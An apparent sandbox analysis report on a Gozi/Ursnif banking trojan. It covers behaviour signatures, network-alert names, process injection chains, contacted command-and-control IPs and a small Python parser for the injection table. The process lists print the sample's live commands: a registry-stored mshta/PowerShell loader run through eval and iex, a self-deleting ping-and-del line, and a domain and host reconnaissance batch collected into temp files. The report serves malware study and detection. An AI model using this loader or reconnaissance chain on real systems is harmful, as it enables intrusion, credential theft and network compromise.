Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-s48daacfck
Target d41d05cc157f874f89c574c74c0e2c58
SHA256 0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
Tags gozi_ifsb 777999 banker suricata trojan
Score 10/10

Analysis Overview

Threat Level: Known bad

The file d41d05cc157f874f89c574c74c0e2c58 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 777999 banker suricata trojan

Gozi, Gozi IFSB

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

Deletes itself

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Runs net.exe

Enumerates processes with tasklist

Discovers systems in the same network

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: CmdExeWriteProcessMemorySpam

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 15:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 15:41

Reported

2022-03-22 15:47

Platform

win7-20220311-en

Max time kernel

4294180s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 1608 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe 6
PID 1928 wrote to memory of 532 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3
PID 532 wrote to memory of 1452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 3
PID 1452 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe 3
PID 532 wrote to memory of 1696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 3
PID 1696 wrote to memory of 1344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe 3
PID 532 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE 3
PID 1192 wrote to memory of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe 6
PID 1912 wrote to memory of 1604 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE 6
PID 1192 wrote to memory of 1652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 3
PID 1652 wrote to memory of 1796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe 3
PID 1192 wrote to memory of 908 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 3
PID 1192 wrote to memory of 1708 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 3
PID 1708 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe 3
PID 1192 wrote to memory of 1452 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe 7
PID 1192 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 3
PID 1192 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 3

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Te7a='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Te7a).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71\\\OperatorMask'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sjndtifo -value gp; new-alias -name hlshhlju -value iex; hlshhlju ([System.Text.Encoding]::ASCII.GetString((sjndtifo "HKCU:Software\AppDataLow\Software\Microsoft\1F204AFB-F2EE-A981-F4C3-46ED68A7DA71").ClassControl))

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmcimu1x.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDC3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDB2.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0tccqdc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE4F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDE4E.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\71B8.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\71B8.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\B64C.bin1 > C:\Users\Admin\AppData\Local\Temp\B64C.bin & del C:\Users\Admin\AppData\Local\Temp\B64C.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
NL 146.70.35.138:80 146.70.35.138 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.148:80 193.56.146.148 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
CA 67.43.234.14:80 67.43.234.14 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 15:41

Reported

2022-03-22 15:47

Platform

win10v2004-en-20220113

Max time kernel

152s

Max time network

140s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe N/A 2
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2
N/A N/A C:\Windows\Explorer.EXE N/A 60
(identical rows collapsed; Count is the number of events recorded for that row)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe 5
PID 4748 wrote to memory of 1464 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2
PID 1464 wrote to memory of 3680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2
PID 3680 wrote to memory of 3864 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe 2
PID 1464 wrote to memory of 208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2
PID 208 wrote to memory of 2044 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe 2
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE 4
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe 4
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe 5
PID 3032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe 4
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE 5
PID 3032 wrote to memory of 3944 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe 4
PID 3032 wrote to memory of 4524 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 2
PID 4524 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe 2
PID 3032 wrote to memory of 3548 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 2
PID 3032 wrote to memory of 3224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 2
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe 6
PID 3224 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe 2
PID 3032 wrote to memory of 4156 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 2
PID 3032 wrote to memory of 1572 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 2
PID 1572 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe 2
PID 3032 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe 1
(identical rows collapsed in first-seen order; Count is the number of WriteProcessMemory events recorded for that writer/target pair)
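The table above records one row per WriteProcessMemory event, so the same writer/target pair repeats and the injection chain (dropper into a copy of itself, then mshta into powershell, powershell into Explorer.EXE, and Explorer.EXE into RuntimeBroker.exe and cmd.exe children) has to be read out by hand. The Python below is an added example written for this page, not code from the sandbox vendor: it parses rows in the exact format shown above into a weighted directed graph, finds the root injectors (PIDs that write into others but are never written into), and reconstructs the shortest chain between any two PIDs. SAMPLE_ROWS is a constructed subset of the rows above; the function names are this example's own.

```python
import re
from collections import defaultdict, deque

# Row format of the report's "Suspicious use of WriteProcessMemory" table:
#   PID <writer> wrote to memory of <target> N/A <writer image> <target image>
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Constructed sample: a subset of the behavioral2 rows above, in report order.
SAMPLE_ROWS = r"""
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 4748 wrote to memory of 1464 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1464 wrote to memory of 3680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
"""


def parse_rows(text):
    """Return (edges, images): edges[writer][target] = event count and
    images[pid] = image path, parsed from rows in the report's format.
    Header lines and anything else that does not match are ignored."""
    edges = defaultdict(lambda: defaultdict(int))
    images = {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        writer, target = int(m[1]), int(m[2])
        edges[writer][target] += 1
        images.setdefault(writer, m[3])
        images.setdefault(target, m[4])
    return edges, images


def roots(edges):
    """PIDs that write into other processes but are never written into: the
    start of each chain (here the dropper, and the mshta launcher that was
    started from the registry-stored stage rather than by injection)."""
    targets = {t for ts in edges.values() for t in ts}
    return sorted(p for p in edges if p not in targets)


def injection_path(edges, src, dst):
    """Shortest chain of WriteProcessMemory events from src to dst (BFS),
    or [] when dst is not reachable from src."""
    prev = {src: None}
    queue = deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in edges.get(cur, {}):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return []


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def render_chain(edges, images, src, dst):
    """Readable form, e.g. 'mshta.exe(4748) -> powershell.exe(1464) -> ...'."""
    return " -> ".join(f"{_basename(images[p])}({p})"
                       for p in injection_path(edges, src, dst))


if __name__ == "__main__":
    edges, images = parse_rows(SAMPLE_ROWS)
    for r in roots(edges):
        print("root injector:", _basename(images[r]), r)
    print(render_chain(edges, images, 4748, 3440))
```

The self-injection row (PID 1268 writing into PID 1648, both the dropper image) is what the "Suspicious use of SetThreadContext" signature in the summary corresponds to: the dropper starts a second copy of itself and overwrites it before it runs. Because mshta (4748) is a root rather than a child of that pair, the graph alone does not show how the sample got from the hollowed dropper to the registry-stored launcher; that link is the HKCU key in the mshta command line in the Processes list.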

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp" "c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

